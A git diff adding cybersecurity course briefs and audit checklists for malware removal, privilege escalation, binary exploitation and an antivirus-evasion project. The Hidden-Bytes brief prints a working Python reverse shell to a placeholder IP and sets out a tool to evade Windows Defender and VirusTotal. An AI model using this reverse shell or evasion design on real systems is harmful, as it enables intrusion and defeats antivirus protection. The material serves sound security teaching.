diff --git a/subjects/cybersecurity/defuse/README.md b/subjects/cybersecurity/defuse/README.md
new file mode 100644
index 000000000..a17b8b18e
--- /dev/null
+++ b/subjects/cybersecurity/defuse/README.md
@@ -0,0 +1,133 @@
+## Defuse
+
+<center>
+<img src="pictures/defuse-meme.jpg" style="width: 600px; height: auto;">
+</center>
+
+### Introduction
+
+Malware analysis is a critical skill in cybersecurity, enabling analysts to understand and counteract malicious software. In this project, you will explore and neutralize a Windows-based malware sample in a controlled environment. The goal is to analyze the malware's behavior, develop a program to eradicate it and gather key details, including the attacker's IP address.
+
+### Objective
+
+This project aims to help you gain hands-on experience with malware analysis and mitigation. You will set up a Windows-based virtual machine, analyze a malware sample, and create a program to remove it effectively.
+
+By completing this project, you will:
+
+- Understand the fundamentals of malware analysis and behavior.
+- Learn to identify and eradicate malware persistence mechanisms.
+- Develop a program to neutralize malware and prevent its persistence.
+- Gain experience in reverse engineering and process debugging.
+- Understand the importance of secure environments for malware research.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you will act as a **Malware Analyst** presenting your findings to a hypothetical team of stakeholders. Prepare to discuss:
+
+- How did you analyze the malware and identify its behavior?
+- The functionality of your program and how it eradicates the malware.
+- The impact the malware could have if executed in an uncontrolled environment.
+- Recommendations for mitigating similar threats in the future.
+- Ethical considerations when handling and analyzing malware samples.
+
+### Project Requirements
+
+#### Setup and Installation
+
+Download the provided malware sample and set up a Windows virtual machine in VirtualBox or another virtualization software.
+
+- **Malware Sample Download Link**:
+  - [Malware Sample](<./resources/Fynloski(ON VM ONLY).zip>)
+
+> Ensure the malware is executed within a secure, isolated environment to prevent accidental spread or damage.
+
+#### The Challenge
+
+- **Develop a Program**: Using a programming language of your choice create a program that will:
+  - Kill the malware process.
+  - Remove the malware’s persistence mechanisms (e.g., from startup folders, and registry entries).
+  - Stop and completely remove the malware from the virtual machine.
+  - Extract and display the attacker's IP address.
+- **Malware Analysis**: Study the malware's behavior, including persistence mechanisms and communication methods.
+
+#### Malware Mitigation Report Email
+
+Draft an email as if reporting the malware analysis results through a threat intelligence channel. The report should include a summary of the malware's behavior, proof of eradication, and a brief explanation of your program’s functionality.
+
+**Your report should include:**
+
+- **Subject Line**: "Malware Analysis Report: Mitigation of [Malware Name]"
+- **Summary**: A concise description of the malware's behavior and impact.
+- **Proof of Mitigation**: Evidence that the malware process was terminated and persistence mechanisms were removed.
+- **Attacker Information**: Display the attacker's IP address.
+
+**Example Email**:
+
+---
+
+**To**: security@[organization].com  
+**Subject**: Malware Analysis Report: Mitigation of [Malware Name]
+
+**Dear Security Team,**
+
+I am writing to report the successful analysis and mitigation of [Malware Name] identified during an educational malware analysis exercise. Below are the details:
+
+**Summary**:  
+The malware exhibited persistence mechanisms by adding to the Windows startup registry and communicating with a remote server. It was also running a process under the name `[ProcessName]`.
+
+**Proof of Mitigation**:  
+The malware process was successfully terminated, and its persistence mechanisms were removed. Additionally, its file was deleted from the system.
+
+**Attacker Information**:  
+The malware communicated with the following IP address: `192.168.X.X`.
+
+Please feel free to reach out for further clarification or additional details.
+
+**Best regards,**  
+[Your Name]  
+[Your Contact Information]
+
+### Documentation
+
+Create a `README.md` file that includes:
+
+- **Program Explanation**: Explain the functionality of your program and how it neutralizes the malware.
+- **Walkthrough**: Describe the step-by-step process of how you analyzed and eradicated the malware.
+- **Remediation**: Suggest ways to prevent similar malware infections.
+- **Malware Mitigation Report Email**: Include your drafted report.
+- **Ethical Hacking Report**: Discuss the ethical responsibilities when performing malware analysis. This report should cover the following points:
+  1. The importance of a controlled environment for malware testing.
+  2. The legal and ethical boundaries of malware analysis.
+  3. The risks of executing malware outside of isolated environments.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement anything that you feel deserves to be a bonus, for example:
+
+- **Dynamic Analysis Automation**: Automate the detection and removal of malware persistence mechanisms.
+- **Threat Intelligence Integration**: Use APIs to gather detailed information about the malware.
+
+Challenge yourself!
+
+### Ethical and Legal Considerations
+
+You are responsible for ensuring all malware analysis is conducted within a secure, isolated environment. Do not use or share the malware outside of this project. Any misuse of these techniques is strictly prohibited.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. Unauthorized use of these techniques is prohibited and may violate local laws.
+
+### Submission and Audit
+
+Submit the following:
+
+- The source code of your malware removal program.
+- `README.md` containing your analysis and mitigation walkthrough and your report email.
+
+Ensure VirtualBox or equivalent software is installed for the audit.
+
+### Resources
+
+Some useful resources:
+
+- [Microsoft Malware Encyclopedia](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2fFynloski): Detailed analysis of malware behaviors.
+- [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon): A tool for real-time file system, registry, and process/thread activity monitoring.
+- [Registry Analysis Basics](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-baselines): Understanding the Windows registry.
diff --git a/subjects/cybersecurity/defuse/audit/README.md b/subjects/cybersecurity/defuse/audit/README.md
new file mode 100644
index 000000000..dcfc172a1
--- /dev/null
+++ b/subjects/cybersecurity/defuse/audit/README.md
@@ -0,0 +1,107 @@
+#### General
+
+##### Check the Repo Content:
+
+- The student's malware removal program source code.
+- Detailed documentation in the README.md file explains how to use the program and includes the malware mitigation report email.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student plays the role of a **Malware Analyst** presenting their findings to a team of stakeholders. Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- How did you analyze the malware and identify its behavior?
+- Can you explain how your program works and the steps it takes to neutralize the malware?
+- What impact could this malware have if executed in an uncontrolled environment?
+- What measures would you recommend to prevent similar malware infections in the future?
+- How did you ensure that the malware was analyzed and mitigated ethically within a secure environment?
+
+###### Did the student demonstrate a thorough understanding of the project and its concepts?
+
+###### Was the student able to communicate effectively and explain their findings?
+
+###### Did the student discuss the real-world impact of malware and their recommendations for mitigation?
+
+##### Review the Student Documentation
+
+Verify that the `README.md` file contains:
+
+- **Program Explanation**: Explain the functionality of your program and how it neutralizes the malware.
+- **Walkthrough**: Describe the step-by-step process of how you analyzed and eradicated the malware.
+- **Remediation**: Suggest ways to prevent similar malware infections.
+- **Malware Mitigation Report Email**: Include your drafted report.
+- **Ethical Hacking Report**: Discuss the ethical responsibilities when performing malware analysis.
+
+###### Does the README file clearly explain the program's functionality?
+
+###### Does the README include a walkthrough of the analysis and removal process and the remediation?
+
+###### Does the README file include the malware mitigation report email?
+
+###### Does the README file include the ethical hacking report?
+
+##### Set Up the Virtual Machine:
+
+1. Create a Windows virtual machine.
+2. Download the provided malware sample ([Malware Sample](<./resources/Fynloski(ON VM ONLY).zip>)).
+3. Add the malware sample to antivirus exceptions.
+4. Launch the malware executable.
+
+> Ensure the malware is executed within a secure, isolated environment to prevent accidental spread or damage.
+
+###### Does the malware executable appear in the Task Manager?
+
+##### Launch the Student's Program:
+
+Run the student's malware removal program.
+
+###### Does the program developed by the student terminate the malware process?
+
+###### Is the malware process removed from the Task Manager?
+
+###### Does the program remove the malware's persistence mechanisms from the system?
+
+##### Check Startup Persistence:
+
+Open Task Manager using **CTRL+ALT+DEL** or **Windows key+R -> msconfig**.
+
+###### Is the malware removed from the startup programs?
+
+Open the Registry Editor using **Windows key+R -> regedit**. Verify the following registry keys:
+
+- **HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run**
+- **HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce**
+- **HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run**
+- **HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce**
+
+###### Is the malware absent from all the above registry locations?
+
+##### Attacker's IP Address:
+
+Confirm that the program extracts and displays the attacker's IP address.
+
+The attacker's IP address is `127.0.0.1`
+
+###### Does the student's program display the attacker's IP address correctly?
+
+##### Review the Student's Malware Mitigation Report Email
+
+Ask the student to present their **Mitigation Report Email**. Ensure that it includes:
+
+- **Subject Line**: "Malware Analysis Report: Mitigation of [Malware Name]"
+- **Summary**: A concise description of the malware's behavior and impact.
+- **Proof of Mitigation**: Evidence that the malware process was terminated and persistence mechanisms were removed.
+- **Attacker Information**: Display the attacker's IP address.
+
+###### Does the email contain a concise summary of the malware's behavior and impact?
+
+###### Does the email include proof of mitigation (e.g., terminated process, removed persistence mechanisms)?
+
+###### Does the email display the attacker's IP address?
+
+#### Bonus
+
+###### + Did the student implement additional features, such as dynamic analysis automation or threat intelligence integration?
+
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/defuse/pictures/defuse-meme.jpg b/subjects/cybersecurity/defuse/pictures/defuse-meme.jpg
new file mode 100644
index 000000000..c42420406
Binary files /dev/null and b/subjects/cybersecurity/defuse/pictures/defuse-meme.jpg differ
diff --git a/subjects/cybersecurity/defuse/resources/Fynloski(ON VM ONLY).zip b/subjects/cybersecurity/defuse/resources/Fynloski(ON VM ONLY).zip
new file mode 100644
index 000000000..885b1d19b
Binary files /dev/null and b/subjects/cybersecurity/defuse/resources/Fynloski(ON VM ONLY).zip differ
diff --git a/subjects/cybersecurity/escalator/README.md b/subjects/cybersecurity/escalator/README.md
new file mode 100644
index 000000000..368384039
--- /dev/null
+++ b/subjects/cybersecurity/escalator/README.md
@@ -0,0 +1,140 @@
+## Escalator
+
+<center>
+<img src="resources/escalator.jpg" style="width: 702px; height: 395px;">
+</center>
+
+### Introduction
+
+Privilege escalation is a fundamental concept in cybersecurity, allowing attackers to elevate their privileges on a system to gain higher levels of access. In this project, you will explore and understand privilege escalation techniques using a virtual machine (VM) designed for this challenge. The goal is to gain root access to the system and retrieve a hidden flag.
+
+### Objective
+
+The goal of this project is to help you gain hands-on experience with privilege escalation. You will install a provided VM locally, identify the IP address, enumerate the system for potential vulnerabilities, and ultimately escalate your privileges from a regular user to root.
+
+By completing this project, you will:
+
+- Develop a practical understanding of privilege escalation in Linux systems.
+- Learn to identify and exploit vulnerabilities that can lead to unauthorized access.
+- Gain experience in ethical hacking and penetration testing methodologies.
+- Understand the importance of securing systems against privilege escalation attacks.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you will act as a **Penetration Tester** presenting your findings to a hypothetical team of stakeholders. Prepare to discuss:
+
+- How you identified and leveraged the vulnerabilities.
+- The impact these vulnerabilities could have in real-world scenarios.
+- Recommendations for securing the system against privilege escalation.
+- The importance of responsible disclosure and ethical hacking practices.
+
+### Project Requirements
+
+#### Setup and Installation
+
+Download the provided VM image and set it up in VirtualBox:
+
+- **Download Links**:
+  - [VM Image - OVA Format](https://assets.01-edu.org/cybersecurity/local/01-Local.ova)
+  - For Apple Silicon or ARM architecture (e.g., M1, M2), use [VM Image - UTM Format](https://assets.01-edu.org/cybersecurity/local/01-Local1.utm.zip)
+- **SHA1 Checksums**:
+  - `01-Local1.ova`: `f3422f3364fd38e8183740f8f57fa951d3f6e0bf`
+  - `01-Local1.utm.zip`: `d4a40ca50044778ddc01a57ac16382e4140000e0`
+
+Ensure VirtualBox is installed and properly configured for the audit.
+
+#### The Challenge
+
+- **Achieve Root Access**: Your main objective is to escalate privileges and gain root access.
+- **Find the Flag**: Once root access is achieved, locate and display the flag in `/root/root.txt`.
+- **Document Your Process**: Keep thorough notes on your methodology for reporting purposes.
+
+#### Guidances
+
+- **IP Discovery**: Use network scanning tools to identify the IP address of the VM.
+- **Enumeration**: Leverage system enumeration tools to gather information on running processes, services, and configurations.
+- **Privilege Escalation**: Investigate user permissions, files, and services that could be used for privilege escalation.
+- **Document Your Process**: Keep thorough notes on your methodology for reporting purposes.
+
+#### Vulnerability Report Email
+
+Draft an email as if reporting the vulnerability through a bug bounty program. The report should show proof of root access and include the flag without disclosing full reproduction steps.
+
+**Your report should include:**
+
+- **Subject Line**: "Security Vulnerability Report: Privilege Escalation in [System/Environment Name]"
+- **Summary**: A concise description of the vulnerability.
+- **Impact**: The potential risk and implications of the vulnerability.
+- **Proof of Root Access**: Indicate root access and display the flag.
+
+**Example Email**:
+
+---
+
+**To**: security@[organization].com  
+**Subject**: Security Vulnerability Report: Privilege Escalation in [System/Environment Name]
+
+**Dear Security Team,**
+
+I am writing to report a potential security vulnerability identified during an educational penetration testing exercise. The vulnerability involves privilege escalation within [System/Environment Name]. Below are the details:
+
+**Summary**:  
+The vulnerability allows an authenticated user to escalate their privileges to root due to [brief reason, e.g., misconfigured file permissions or an exploitable SUID binary].
+
+**Impact**:  
+If exploited, this could lead to unauthorized root access, compromising the system's integrity and exposing sensitive data.
+
+**Proof of Root Access**:  
+I successfully gained root access and retrieved the flag: {flag}
+<screenshot>
+
+Please feel free to reach out for further details or clarification.
+
+**Best regards,**  
+[Your Name]  
+[Your Contact Information]
+
+### Documentation
+
+Create a `README.md` file that contains the following:
+
+- **Walkthrough**: Describe the step-by-step process of how you exploited the vulnerability.
+- **Remediation**: Suggest ways to fix or mitigate the vulnerability.
+- **Vulnerability Report Email**: Include your drafted report.
+- **Ethical Hacking Report**: Discusses the ethical responsibilities when performing security testing. This report should cover the following points:
+
+1. The importance of obtaining proper authorization before testing.
+2. The legal and ethical boundaries of vulnerability testing.
+3. How to report vulnerabilities responsibly and avoid causing harm.
+
+### Bonus
+
+If you complete the mandatory part successfully, and you still have free time, you can implement anything that you feel deserves to be a bonus, for example:
+
+- **Exploring Alternative Methods**: Document different privilege escalation paths.
+- **Post-Exploitation Analysis**: Explain potential next steps after gaining root access.
+
+Challenge yourself!
+
+### Ethical and Legal Considerations
+
+You are responsible for following ethical hacking guidelines and only performing security testing in the provided VM environment. Do not use these techniques on unauthorized systems.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. All testing must be done ethically and following legal standards. Unauthorized use of these techniques is prohibited and may be illegal.
+
+### Submission and Audit
+
+Submit the following:
+
+- `README.md` with your walkthrough and vulnerability report email.
+- Any scripts or files used during the project.
+
+Ensure VirtualBox is installed for the audit.
+
+### Resources
+
+Some useful resources:
+
+- [Privilege_escalation](https://en.wikipedia.org/wiki/Privilege_escalation): Privilege escalation - Wikipedia.
+- [Nmap](https://nmap.org/): A powerful network scanning tool for discovering hosts and services.
+- [Dirsearch](https://github.com/maurosoria/dirsearch): A web path scanner useful for directory enumeration.
diff --git a/subjects/cybersecurity/escalator/audit/README.md b/subjects/cybersecurity/escalator/audit/README.md
new file mode 100644
index 000000000..5429ed2cd
--- /dev/null
+++ b/subjects/cybersecurity/escalator/audit/README.md
@@ -0,0 +1,85 @@
+#### General
+
+##### Check the Repo Content
+
+Files that must be present in the repository:
+
+- Detailed documentation in the `README.md` file contains the walkthrough and vulnerability report email.
+- Any scripts or files created or used during the project.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student plays the role of a **Penetration Tester** presenting their findings to a team of stakeholders (auditors). Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- What steps did you take to identify and escalate privileges?
+- Can you explain the impact of the vulnerabilities you found?
+- How would you recommend mitigating or fixing these vulnerabilities?
+- What tools and techniques did you use for enumeration and privilege escalation?
+- How did you ensure that your testing adhered to ethical standards?
+
+###### Did the student demonstrate a thorough understanding of the project and concepts?
+
+###### Was the student able to communicate effectively and explain their findings?
+
+###### Did the student discuss the potential real-world impact of the vulnerabilities?
+
+###### Was the student able to justify the security measures and recommendations they provided?
+
+##### Review the Student Documentation
+
+Verify that the `README.md` file contains:
+
+- **Walkthrough**: Describe the step-by-step process of how you exploited the vulnerability.
+- **Remediation**: Suggest ways to fix or mitigate the vulnerability.
+- **Vulnerability Report Email**: Include your drafted report.
+- **Ethical Hacking Report**: Discusses the ethical responsibilities when performing security testing.
+
+###### Does the `README.md` file include a complete and clear walkthrough?
+
+###### Are remediation and mitigation suggestions included and well-explained?
+
+###### Does the documentation discuss the ethical implications and responsibilities of vulnerability testing?
+
+###### Are Vulnerability Report Email included?
+
+##### Test the Challenge
+
+Verify that the student can:
+
+1. **Demonstrate IP Discovery**:
+
+   - Confirm that the student used appropriate tools to identify the IP of the VM.
+
+2. **Enumerate the System**:
+
+   - Ask the student to show their enumeration process and findings.
+
+3. **Achieve Root Access**:
+   - Ask the student to demonstrate gaining root access.
+   - Verify that they can show the flag located at `/root/root.txt`.
+
+###### Did the student use appropriate tools for IP discovery?
+
+###### Were the enumeration results relevant and useful for the escalation process?
+
+###### Was the student able to achieve root access and find the flag?
+
+##### Review the Vulnerability Report Email
+
+Ask the student to present their **Vulnerability Report Email**. Ensure that it includes:
+
+- A clear and concise summary of the vulnerability.
+- The impact and potential real-world implications.
+- Proof of root access (e.g., a screenshot showing the flag).
+
+###### Does the email meet the email requirements defined in the subject?
+
+#### Bonus
+
+###### + Did the student explore alternative escalation methods and document them?
+
+###### + Did the student conduct post-exploitation analysis and explain potential next steps?
+
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/escalator/resources/escalator.jpg b/subjects/cybersecurity/escalator/resources/escalator.jpg
new file mode 100644
index 000000000..3407b01f2
Binary files /dev/null and b/subjects/cybersecurity/escalator/resources/escalator.jpg differ
diff --git a/subjects/cybersecurity/hidden-bytes/README.md b/subjects/cybersecurity/hidden-bytes/README.md
new file mode 100644
index 000000000..ab21e0295
--- /dev/null
+++ b/subjects/cybersecurity/hidden-bytes/README.md
@@ -0,0 +1,156 @@
+## Hidden-Bytes
+
+<center>
+<img src="pictures/hiddenbytes.jpg" style="width: 800px; height: auto;">
+</center>
+
+### Introduction
+
+HiddenBytes challenges you to explore advanced concepts in binary manipulation, obfuscation, and stealth techniques. You will develop two interrelated programs: one that encrypts and modifies binaries while bypassing detection mechanisms and another that generates polymorphic binaries capable of maintaining functionality while dynamically changing their structure.
+
+This project will provide insight into how attackers use advanced techniques to evade detection and ensure persistent execution while adhering to ethical and legal guidelines.
+
+### Objective
+
+The goal of this project is to develop:
+
+1. **An Evasion Program**: Encrypts and modifies binaries, adding stealth techniques like file size manipulation and delayed execution to bypass detection mechanisms.
+2. **A Polymorphic Program**: A program that self-modifies but retains its core functionality. This will implement a basic reverse shell payload for practical learning.
+
+By completing this project, you will:
+
+- Understand techniques for binary obfuscation and stealth.
+- Explore polymorphic behavior in binary files.
+- Learn practical approaches to bypassing antivirus detection.
+- Gain hands-on experience with reverse engineering and payload delivery.
+- Develop insights into ethical considerations for such techniques.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you act as a **Binary Analyst** presenting your work to a team of stakeholders. Prepare to discuss:
+
+- The structure and functionality of the binaries you developed.
+- What techniques did you use to implement stealth and polymorphism?
+- Recommendations for detecting and mitigating similar techniques.
+- Ethical considerations and legal implications of working with obfuscated binaries.
+
+### Reverse Shell Payload Explanation
+
+A reverse shell payload is a piece of code that allows a target machine to initiate a connection back to an attacker's machine. This is often used in penetration testing to simulate real-world attack scenarios. In this project, you’ll implement a basic reverse shell payload for educational purposes.
+
+#### Example:
+
+A simple reverse shell in Python:
+
+```python
+import socket, subprocess, os
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.1.100", 4444))  # Replace with the attacker's IP and port
+os.dup2(s.fileno(), 0)
+os.dup2(s.fileno(), 1)
+os.dup2(s.fileno(), 2)
+subprocess.call(["/bin/sh", "-i"])
+```
+
+> ⚠️ Warning: Ensure that the reverse shell payload is tested **only** in a controlled, isolated environment, such as your virtual machine. Replace the IP and port in the example with local testing values.
+
+### Project Requirements
+
+#### Setup and Environment
+
+- Use a Windows-based virtual machine as your development and testing environment.
+- Ensure proper isolation to prevent unintended consequences.
+
+#### The Challenge
+
+1. **Evasion Program:**
+
+- Encrypt a target binary and add stealth features:
+    - File size manipulation: Increase the binary size. (e.g., 101 MB).
+    - Execution delay: Ensure the binary does not execute until a specified delay (e.g., 101 seconds).
+- Ensure the encrypted binary bypass detection by Windows Defender and at least 60% of security vendors on VirusTotal.
+
+2. **Polymorphic Program:**
+
+- Generate binaries that self-modify while maintaining their original functionality.
+- Use a reverse shell as the payload for the polymorphic binary.
+
+#### Usage Examples
+
+**Evasion Program:**
+
+```sh
+$> evasion --help
+Evasion Program Usage:
+  --encrypt <target-binary>        Encrypt the target binary.
+  --output <output-binary>         Specify the name of the encrypted binary file.
+  --add-size <size-in-mb>          Increase the binary size (e.g., 101 MB).
+  --delay <seconds>                Specify execution delay in seconds (default: 101).
+$> evasion --encrypt target.exe --output obfuscated.exe --add-size 101 --delay 101
+Encryption is successful! Encrypted binary saved as "obfuscated.exe".
+$> obfuscated.exe
+[INFO] Execution delayed by 101 seconds...
+[INFO] Binary decrypted successfully.
+[INFO] Target program executed.
+```
+
+**Polymorphic Program:**
+
+```sh
+$> polymorph --help
+Polymorphic Program Usage:
+  --generate <output-binary>       Generate a polymorphic binary.
+  --payload <reverse-shell-code>   Embed the reverse shell payload.
+$> polymorph --generate polymorphic.exe --payload reverse_shell_payload
+Polymorphic binary generated successfully as "polymorphic.exe".
+$> polymorphic.exe
+[INFO] Polymorphic signature updated successfully.
+[INFO] Reverse shell initialized. Attempting connection to attacker...
+```
+
+### Documentation
+
+Create a `README.md` file that includes:
+
+- Evasion Program Explanation: Detail how the program encrypts and modifies binaries.
+- Polymorphic Program Explanation: Explain how the program generates self-modifying binaries.
+- Walkthroughs: Provide step-by-step instructions for using both programs.
+- Technical Insights: Include binary structure analysis, encryption methods, and stealth techniques.
+- Ethical and Legal Report: Discuss ethical responsibilities and legal considerations when working with these techniques.
+
+### Bonus
+
+If you complete the mandatory part successfully, challenge yourself by adding additional features, such as:
+
+- Advanced Obfuscation Techniques: Add features like API hooking, anti-debugging checks, or stealth memory allocation for obfuscating payloads further.
+- Custom Encryption Algorithms: Develop your encryption algorithm for better security.
+- GUI Implementation: Create a graphical interface for ease of use.
+
+Challenge yourself!
+
+### Ethical and Legal Considerations
+
+This project is for educational purposes only. You are responsible for ensuring all testing is conducted within a secure, isolated environment. Do not use or share the tools developed in this project outside of its intended purpose. Misuse of these techniques is strictly prohibited and may violate local laws.
+
+> ⚠️ Disclaimer: This project is for educational purposes only. Unauthorized use of these techniques is prohibited and may be illegal.
+
+> ⚠️ Disclaimer: Unauthorized use of reverse shells or obfuscated binaries outside of this controlled project environment is strictly prohibited. Misuse may result in legal consequences.
+
+### Submission and Audit
+
+Submit the following:
+
+- Source code for both the evasion and polymorphic programs.
+- `README.md` file with detailed documentation.
+
+Ensure that VirtualBox or equivalent software is installed for the audit.
+
+### Resources
+
+Some useful resources:
+
+- [Bypassing Antivirus Dynamics](https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf): Insights into bypassing antivirus systems.
+- [Cryptology Resources](https://0x00sec.org/c/cryptology/): Explore cryptographic techniques.
+- [Executable File Formats](https://en.wikipedia.org/wiki/Executable_and_Linkable_Format): Learn about ELF, PE, and other formats.
+- [Netcat for Reverse Shells](https://en.wikipedia.org/wiki/Netcat): Understand reverse shells and their applications.
diff --git a/subjects/cybersecurity/hidden-bytes/audit/README.md b/subjects/cybersecurity/hidden-bytes/audit/README.md
new file mode 100644
index 000000000..60f24fc91
--- /dev/null
+++ b/subjects/cybersecurity/hidden-bytes/audit/README.md
@@ -0,0 +1,99 @@
+#### General
+
+##### Check the Repo Content:
+
+Files that must be present in the repository:
+
+- Source code for both the Evasion and Polymorphic programs.
+- `README.md` file with detailed documentation.
+
+###### Are all the required files present?
+
+##### Play the Role of a Stakeholder
+
+Conduct a simulated scenario where the student plays the role of a **Binary Analyst** presenting their programs to a team of stakeholders (auditors). Evaluate their understanding, communication skills, and depth of knowledge. Suggested questions include:
+
+- How does your evasion program encrypt and modify binaries to bypass detection?
+- What techniques did you use to evade antivirus detection, and how do they work?
+- Can you explain how your polymorphic program generates self-modifying binaries?
+- What are the ethical and legal implications of developing such programs?
+- How would you recommend detecting and defending against similar techniques?
+
+###### Did the student demonstrate a thorough understanding of the project and concepts?
+
+###### Was the student able to communicate effectively and explain their findings?
+
+###### Did the student discuss the potential real-world impact of these techniques?
+
+###### Was the student able to justify the security measures and recommendations they provided?
+
+##### Review the Student Documentation
+
+Verify that the README.md file contains the following:
+
+- **Evasion Program Explanation**: Clearly describe how the program encrypts and modifies binaries.
+- **Polymorphic Program Explanation**: Detailed explanation of how the self-modifying binaries are generated.
+- **Walkthroughs**: Step-by-step usage instructions for both programs.
+- **Technical Insights**: Analysis of binary structure, encryption methods, stealth techniques, and reverse shell payload integration (e.g., how the payload connects to a designated IP and port, and steps to ensure secure testing in an isolated environment).
+- **Ethical and Legal Report**: Discussion of the ethical responsibilities and legal considerations.
+
+###### Does the README.md file include a complete and clear walkthrough for both programs?
+
+###### Are technical explanations of the methods and techniques provided and well-documented?
+
+###### Does the documentation discuss the ethical implications and responsibilities of working with these techniques?
+
+##### Test the Challenge
+
+###### Evasion Program:
+
+Prepare a simple binary file (e.g., simple_program.exe) that prints "Hello, World!".
+Run the evasion program to encrypt the binary:
+
+```sh
+$> ./evasion --encrypt simple_program.exe --output evaded_program.exe --add-size 101 --delay 101
+```
+
+**Verify the following functionalities:**
+
+- File size increased by 101 MB.
+- Execution delay works as expected (e.g., a delay of 101 seconds).
+- The encrypted binary bypasses Windows Defender.
+- The encrypted binary bypasses detection by at least 60% of vendors on VirusTotal.
+
+###### Does the program increase the file size by the specified amount?
+
+###### Does the program enforce the execution delay correctly?
+
+###### Does the program bypass Windows Defender?
+
+###### Does the program bypass at least 60% of vendors on VirusTotal?
+
+###### Polymorphic Program:
+
+Prepare the reverse shell payload. A simple reverse shell payload example can be found in the subject. Ensure that the payload connects to a designated IP and port in a controlled environment.
+
+Run the polymorphic program to generate a self-modifying binary:
+
+```sh
+$> ./polymorphic --generate polymorphic.exe --payload reverse_shell_payload
+```
+
+**Verify the following functionalities:**
+
+- The generated binary maintains its core functionality after modification.
+- The reverse shell payload initializes correctly and connects to the designated IP and port upon execution.
+
+###### Does the polymorphic binary maintain functionality after modification?
+
+###### Does the reverse shell payload execute and connect to the expected IP and port?
+
+#### Bonus
+
+###### + Did the student implement advanced obfuscation techniques, such as anti-debugging or stealth memory allocation?
+
+###### + Did the student use a custom encryption algorithm for enhanced obfuscation?
+
+###### + Did the student create a graphical interface for ease of use?
+
+###### + Is this project an outstanding project that exceeds the basic requirements?
diff --git a/subjects/cybersecurity/hidden-bytes/pictures/hiddenbytes.jpg b/subjects/cybersecurity/hidden-bytes/pictures/hiddenbytes.jpg
new file mode 100644
index 000000000..36564a10a
Binary files /dev/null and b/subjects/cybersecurity/hidden-bytes/pictures/hiddenbytes.jpg differ
diff --git a/subjects/cybersecurity/hole-in-bin/README.md b/subjects/cybersecurity/hole-in-bin/README.md
index cf726b8a6..826a37c77 100644
--- a/subjects/cybersecurity/hole-in-bin/README.md
+++ b/subjects/cybersecurity/hole-in-bin/README.md
@@ -1,46 +1,135 @@
 ## Hole-In-Bin
 
 <center>
-<img src="./pictures/meme.png?raw=true" style = "width: 600px !important; height: 737px !important;"/>
+<img src="./pictures/meme.png?raw=true" style="width: 808px !important; height: auto !important;"/>
 </center>
 
+### Introduction
+
+**Hole-In-Bin** is a comprehensive learning platform designed to teach participants the fundamentals of reverse engineering and binary exploitation. By analyzing and exploiting vulnerabilities in binaries, you will strengthen your understanding of low-level system mechanics and learn essential techniques for identifying and mitigating security risks.
+
 ### Objective
 
-This exercise is designed to test your skills and understanding of binary exploitation and reverse engineering. You will need to work through a series of binary exploitation challenges using a provided virtual machine.
+The primary objective of this project is to develop your skills in binary exploitation and reverse engineering. By analyzing and exploiting the provided binaries, you will gain practical experience with concepts such as buffer overflows and memory vulnerabilities.
+
+By completing this project, you will:
+
+- Analyze and exploit binaries to uncover security vulnerabilities.
+- Understand assembly code and memory structures.
+- Gain hands-on experience with debugging and disassembly tools.
+- Enhance your ability to communicate complex technical findings effectively.
+
+### Role Play
+
+As part of the project, you will participate in a role-play session where you act as a **Security Analyst**. Be prepared to:
+
+- Explain your approach to analyzing and exploiting binaries.
+- Discuss the real-world implications of the vulnerabilities you identified.
+- Propose practical solutions and prevention methods.
+
+The role-play session will test your ability to communicate complex technical concepts effectively and ethically.
+
+### Project Requirements
 
-### Setup
+#### Setup and Installation
 
-1. Download the virtual machine image [hole-in-bin.ova](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.ova). For machine running with Apple Silicon CPU or ARM architecture (e.g. M1, M2 ...) use the following [hole-in-bin.utm.zip](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.utm.zip). This image contains all the binaries you will need to exploit.
+Download the provided VM image and set it up in VirtualBox or UTM:
 
-SHA1 for `hole-in-bin.ova`: 7db09b7a8fdfe25c286561dfa7ca5b50718bd60c
-SHA1 for `hole-in-bin.utm.zip`: fc93533b2054d10d03b09d53c223e57bf7ac7b62
+- **Download Links**:
 
-2. Load the virtual machine image into your virtualization software of choice (e.g., VirtualBox, VMWare).
+  - [hole-in-bin.ova](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.ova)
+  - For Apple Silicon or ARM architecture (e.g. M1, M2 ...), use [VM Image - UTM Format](https://assets.01-edu.org/cybersecurity/hole-in-bin/hole-in-bin.utm.zip).
 
-3. Login using the provided credentials (username: user, password: user).
+- **SHA1 Checksums**:
 
-> You will set up a new VM in the audit session!
+  - SHA1 for `hole-in-bin.ova`: 7db09b7a8fdfe25c286561dfa7ca5b50718bd60c
+  - SHA1 for `hole-in-bin.utm.zip`: fc93533b2054d10d03b09d53c223e57bf7ac7b62
 
-### The Challenges
+This VM contains all the binaries you will need to exploit.
 
-Inside the `/opt/hole-in-bin` directory, you will find a set of binaries (ex00 to ex11) that you need to exploit. Each binary presents a unique challenge and will test different aspects of your knowledge about binary exploitation and reverse engineering.
